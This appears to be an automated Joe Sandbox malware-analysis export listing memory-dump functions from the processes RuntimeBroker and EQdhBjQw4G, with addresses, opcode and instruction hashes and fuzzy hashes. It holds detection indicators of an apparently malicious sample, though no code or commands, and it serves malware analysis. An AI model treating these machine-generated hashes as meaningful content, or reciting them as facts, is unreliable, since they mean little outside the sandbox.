                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: eL_H
                                                                      • API String ID: 0-286794928
                                                                      • Opcode ID: 64b25c1d63bc6fbec8fb6309262469e8af3654a6a61a201b3fd06f38cb1cec39
                                                                      • Instruction ID: ad49cafc85b3b33b78d5749828e1c76d9c5f0317e0cbacdf18f21219ae2f440b
                                                                      • Opcode Fuzzy Hash: 64b25c1d63bc6fbec8fb6309262469e8af3654a6a61a201b3fd06f38cb1cec39
                                                                      • Instruction Fuzzy Hash: DA51E331B1CB084FD758DB1CA89667577E1EB99720F14417EE48EC32A2DA35BC428B82
                                                                      Function 00007FFD9B8A08E8 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7b985bbe57a24126e0f60c41fc1b8b421aa354941af2bf17934306914cfeed6
                                                                      • Instruction ID: 20a19ff1b6d99aeca90f4fdeaeddef3fb10ab704254d4a84b7a0a9a2d173871a
                                                                      • Opcode Fuzzy Hash: b7b985bbe57a24126e0f60c41fc1b8b421aa354941af2bf17934306914cfeed6
                                                                      • Instruction Fuzzy Hash: 8E31343130D9184FD768EB5CE89AAB977D1EF8932131505BBE48AC7166E911EC8287C1
                                                                      Function 00007FFD9B8A0998 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 945fcbd2c41492f89978808f452ab6d91af116fa38a7cb91f5a6b4a8aadc64e4
                                                                      • Instruction ID: 1a984bf4050b2a49151cbb7f526b32619ec0ac3f1d4c270a0ddd0c4cce1d69ff
                                                                      • Opcode Fuzzy Hash: 945fcbd2c41492f89978808f452ab6d91af116fa38a7cb91f5a6b4a8aadc64e4
                                                                      • Instruction Fuzzy Hash: 04210320B19D1D1FE758B76C846AA79B7D1EF8C314F0500BDE84EC32E7DD28AC428251
                                                                      Function 00007FFD9B8A119D Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4f4ccf14dddc333ed53055e5d12d28f8069e7ac15b62ee466fb7f0b9d187e62c
                                                                      • Instruction ID: bda3102902089224d6515b9434f7d48fbc369cdee2528c8afe9beb0d061c7d77
                                                                      • Opcode Fuzzy Hash: 4f4ccf14dddc333ed53055e5d12d28f8069e7ac15b62ee466fb7f0b9d187e62c
                                                                      • Instruction Fuzzy Hash: 7431C831A0D54E8FDB55EB68C869ABD7BF0FF6A300F0505BAC049D72A2DF28A541C750
                                                                      Function 00007FFD9B8A0C25 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1138d65abda1f973fc038e85b82822b4f10cef9bd3a4c9d812b636dc8a2192ba
                                                                      • Instruction ID: 9cdd12515332cd9332f54cdc737dbf177b800eda46ecb82cccebe886b8eca1e4
                                                                      • Opcode Fuzzy Hash: 1138d65abda1f973fc038e85b82822b4f10cef9bd3a4c9d812b636dc8a2192ba
                                                                      • Instruction Fuzzy Hash: 0D213C36B1E29D8FE712A7A89C610EC7B60EF46324F0542F3D04CCB1D3D92866468791
                                                                      Function 00007FFD9B8A1B9F Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a9bfb1f5cac24628b98d66d16221019628f436eca00767a6a29719e9a10ec729
                                                                      • Instruction ID: 0ca197581eca46f55b8d729d5e96034a56ae2a9705b4d752ac5ab59478767e6a
                                                                      • Opcode Fuzzy Hash: a9bfb1f5cac24628b98d66d16221019628f436eca00767a6a29719e9a10ec729
                                                                      • Instruction Fuzzy Hash: 69213521F1E90E4FE7B4F76884646B862D2EF89711F5601B5D00ED72F2ED28AE41C710
                                                                      Function 00007FFD9B8A0C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8204ce56c744b30df13bb112bd526c9a4d566629ada19ce729de807217e7191f
                                                                      • Instruction ID: 465e899bb7c4222df28536a53231afbc16d6f0db69679a9d3086ee92879a5439
                                                                      • Opcode Fuzzy Hash: 8204ce56c744b30df13bb112bd526c9a4d566629ada19ce729de807217e7191f
                                                                      • Instruction Fuzzy Hash: 3511A535F1E68D8FE712DBA8896019C7FB0EF56710F0645F7C048DB1E2D938664587A1
                                                                      Function 00007FFD9B8A0C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f94062b04874dcc242c7300cd716b3aa84f94f43da8ebb9387f5d7eacf59513
                                                                      • Instruction ID: da7da82ce6fdddb4bfac7dae3d5ab977d3e24f44920d5dc612a6402592ceb3c8
                                                                      • Opcode Fuzzy Hash: 9f94062b04874dcc242c7300cd716b3aa84f94f43da8ebb9387f5d7eacf59513
                                                                      • Instruction Fuzzy Hash: 5C01C031E1E28D8FE722DBA8886009C7FB0EF1A710F0641F7C048DB2E2E93866458791
                                                                      Function 00007FFD9B8A0C50 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73a75282890802b10eaef3cf932c5ae8774f0ab54f847bc80513f0401dde2670
                                                                      • Instruction ID: 471f744a630007b494eae171c060b0d8e96a8531fdf2b06ed49c758826f2f290
                                                                      • Opcode Fuzzy Hash: 73a75282890802b10eaef3cf932c5ae8774f0ab54f847bc80513f0401dde2670
                                                                      • Instruction Fuzzy Hash: C7019E30E1E28D9EE722DBA888A009C7FB0AF1A700F1541F7C048CB2A2E93866458751
                                                                      Function 00007FFD9B8A1C2D Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction ID: e65bf5c1aeacab4e78987a2e911760b252b18b9c8a8496f27cfa93b02fe75f88
                                                                      • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction Fuzzy Hash: E3F08130B5D41E8AEBB4AB54C8647B87362FB49711F0502B9C00DD31E1DE386A82CB50
                                                                      Function 00007FFD9B8A0B77 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5de9aa42918dc07795adaa7e8dc1679368c7079707c5e510d836251ab69f3e48
                                                                      • Instruction ID: 8aac7ac0bb82620b5c77c38b7bbe15e821c87846183af13740b63c50425fb97a
                                                                      • Opcode Fuzzy Hash: 5de9aa42918dc07795adaa7e8dc1679368c7079707c5e510d836251ab69f3e48
                                                                      • Instruction Fuzzy Hash: 03F0553131E64CCFC741AB38CCA98E83B60EB47205BAA11FAC08AC7462C220086ECB40
                                                                      Function 00007FFD9B8A1CDA Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction ID: 44f3ce6848e6a6433ba0412749b123fed510086ae063d008a124c406766598a5
                                                                      • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction Fuzzy Hash: C1F0D020F1D40E4AEBB4E758C8646B83352AF99711F5542B5C40DE72F5DD28AA46C650
                                                                      Function 00007FFD9B8A42E9 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c13dc39197282c59c77f4b1d8691ffe644b5cfb42e7e6a243db3889a82e71abb
                                                                      • Instruction ID: 52fc1090cb57ed1c11fbbd9c1308ebe8d07f15bf28fcc5a8cadc005d3cfc3023
                                                                      • Opcode Fuzzy Hash: c13dc39197282c59c77f4b1d8691ffe644b5cfb42e7e6a243db3889a82e71abb
                                                                      • Instruction Fuzzy Hash: 2BF02B30918A5C8FCF98EF08C495EE9B7F1FB68305F154199954AE72A0CB31AA80CF85
                                                                      Function 00007FFD9B8A2AD5 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: 7afdaa958ea266e010f8206a2c2b6833ec820bcab1ba8e815be833b4127c7a6a
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 63E01270E0D51A46FBA4A794D8617F9A2A0DB58300F1510B8D50E933E5CD38AF41C655
                                                                      Function 00007FFD9B8A06A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                      • Instruction ID: ab73628609897484b5323898f8225aaedd8b1f29e8e1aaf51fe684aa9bd7f702
                                                                      • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                      • Instruction Fuzzy Hash: B1C04C05F6B61F01F83577EE98660ACA1405BDDF14FD71172D54D400E1AC4D22D94177
                                                                      Function 00007FFD9B8A0B18 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a8faffb6d7c173064e94cb45fe907dacfd8786a3a2eae6cb9d4298120f12918
                                                                      • Instruction ID: a07c5163e6016620cdbf3d61cd6a40f3bbcf20be702acc02684d3371cdbac4d4
                                                                      • Opcode Fuzzy Hash: 2a8faffb6d7c173064e94cb45fe907dacfd8786a3a2eae6cb9d4298120f12918
                                                                      • Instruction Fuzzy Hash: 0BC04C306258098FCA54E76DC98595476A0FB0D215BD60190E40EC7171F65AAD95C745
                                                                      Function 00007FFD9B8A1310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: b66f0a4f3c627f62ea8beb07cea449c7f48290288c6452d6696383f985f3b06a
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: F2C08C3051180C8FC948EB28C88481833A0FB0D300BC20090E009C7270E269EDC2C740
                                                                      Function 00007FFD9B8A4E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: e5b5c26ce102d7dd1f1dedba303de81fb7292dcd98c31b273fe6b3ce7dd73bc5
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: E6C08CA1E2821985E32496A048291AAB3818F09220F528672809D660A5DE28660292A0
                                                                      Function 00007FFD9B8A2555 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c322a57771081253be433fb4b38974365f3155d18d129661ba67f13a07a3227a
                                                                      • Instruction ID: 7854330f94da8ce085ea7036ce23a8332aeff9209b24596dc9a94c2f972ea75a
                                                                      • Opcode Fuzzy Hash: c322a57771081253be433fb4b38974365f3155d18d129661ba67f13a07a3227a
                                                                      • Instruction Fuzzy Hash: 98C08C00F0882E02F3596604043027E80C28F44754F8004B4E00D836CECD0C691202C3
                                                                      Function 00007FFD9B8A06C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: ae704cd2675e12a4067d49166756726089a8d4ea23ac26a08bc41097d1ab0308
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: 37B01200E6740F00E42433FB08920A470405B4C600FC61070D40E40091D84D22980263

                                                                      Executed Functions

                                                                      Function 00007FFD9B8A09AC Relevance: 1.6, Instructions: 1644COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8a0000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a2f03607bdd20828459475357198a41ce35e0128340cee53f6188bc01a4a478f
                                                                      • Instruction ID: 13e15de291339367a893d17a7a423e63ae5ebf8d3c84813adc98d2d67585b0cf
                                                                      • Opcode Fuzzy Hash: a2f03607bdd20828459475357198a41ce35e0128340cee53f6188bc01a4a478f
                                                                      • Instruction Fuzzy Hash: 5BC2C331B1D95E4FEBA8EB5884A1AB873D2FFA8340F1545B9D00DC72D6DD28BD468780
                                                                      Function 00007FFD9B8C1000 Relevance: .4, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8c1000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 10ca03655f58ff82a0a923f0e39a7236266be957d68017e67786449f8f10cb59
                                                                      • Instruction ID: 432a006517ea0f28975c1496643040e2c6f7501e1a6b53c0d06f62cadbf64e1e
                                                                      • Opcode Fuzzy Hash: 10ca03655f58ff82a0a923f0e39a7236266be957d68017e67786449f8f10cb59
                                                                      • Instruction Fuzzy Hash: C1B1CD61B2D69A0BE32DAB6C4CD20B473C1EB9A309B55877EC8DBC3457D92CE50782C1
                                                                      Function 00007FFD9B8BA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8b3000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [
                                                                      • API String ID: 0-784033777
                                                                      • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction ID: ebe96405d0b4b11926bf1887cdb92ebaf3cd62a93d0602a52305c7d25b0faa3b
                                                                      • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction Fuzzy Hash: 60116031A1CB688FDB64DF18C40526AB7E1FB98711F16053ED489E3261CB34B9018B83
                                                                      Function 00007FFD9B8C1B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8c1000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction ID: bb7650356f7d5c5e58d64ea971e03f87f52e82c674cdeed2858ed7e798d392a4
                                                                      • Opcode Fuzzy Hash: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction Fuzzy Hash: 7D11BF6150F3C54FDB53A77488689A57FA0EF43611B0A81EFD0C5CF0B3DA69494ACB12
                                                                      Function 00007FFD9B8C1BE9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8c1000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction ID: 825d34e207d7b75df8fe4d01d6d004ee6a95eeaccaf4bf0af877a17fb57c0459
                                                                      • Opcode Fuzzy Hash: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction Fuzzy Hash: 2FE06D2164E3C04FCB16EB3888688557FA0AE6720174A42EEC086CF1A3EA2D8889C711
                                                                      Function 00007FFD9B8CA039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8c1000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction ID: d4c85a19c988f8ae481850d15cdfad4b3ea28baac6b7a44035ae6bb4b3e4069a
                                                                      • Opcode Fuzzy Hash: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction Fuzzy Hash: 86E06D6164E7C44FCB5AEB748869454BFA0EF6721174A42EFC045CF1A7EA2DC885C701
                                                                      Function 00007FFD9B8C2E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8c1000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction ID: b4a49f4f1ef1186964d0937bb0e67b9b0c1f0695dcb6b0cfbb6661a39f40ff14
                                                                      • Opcode Fuzzy Hash: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction Fuzzy Hash: 04E06D6164E7C44FC71AEA788869854BFA0EF6721174A52EFC045CF1A7EA2D8889C701
                                                                      Function 00007FFD9B8B57D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8b3000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 5cab46bbffd1190c9fbbd7b8ea6ad21cba0cd46f0e766dc4e7fe30dae0abbcc6
                                                                      • Instruction ID: fe2cbfad1581625b9cfff53e52da6bcbe9b6fed1f23e7998a17270866b1435f5
                                                                      • Opcode Fuzzy Hash: 5cab46bbffd1190c9fbbd7b8ea6ad21cba0cd46f0e766dc4e7fe30dae0abbcc6
                                                                      • Instruction Fuzzy Hash: 92E0923060A7C14FCB16AB748468455BFB0EF6720174A46EEC056CB1A3DB2DC886CB01
                                                                      Function 00007FFD9B8B9359 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffd9b8b3000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction ID: fcaf63145801c42f6afee87650239952ccfd267057284dfa9507a20e85fb12cd
                                                                      • Opcode Fuzzy Hash: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction Fuzzy Hash: CDE0ED6154F3D44FCB16DB7488698557FB0AE6B21074B41DEC185CB1B3D619D949C701
                                                                      Function 00007FFD9B8C7D19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2722209367.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
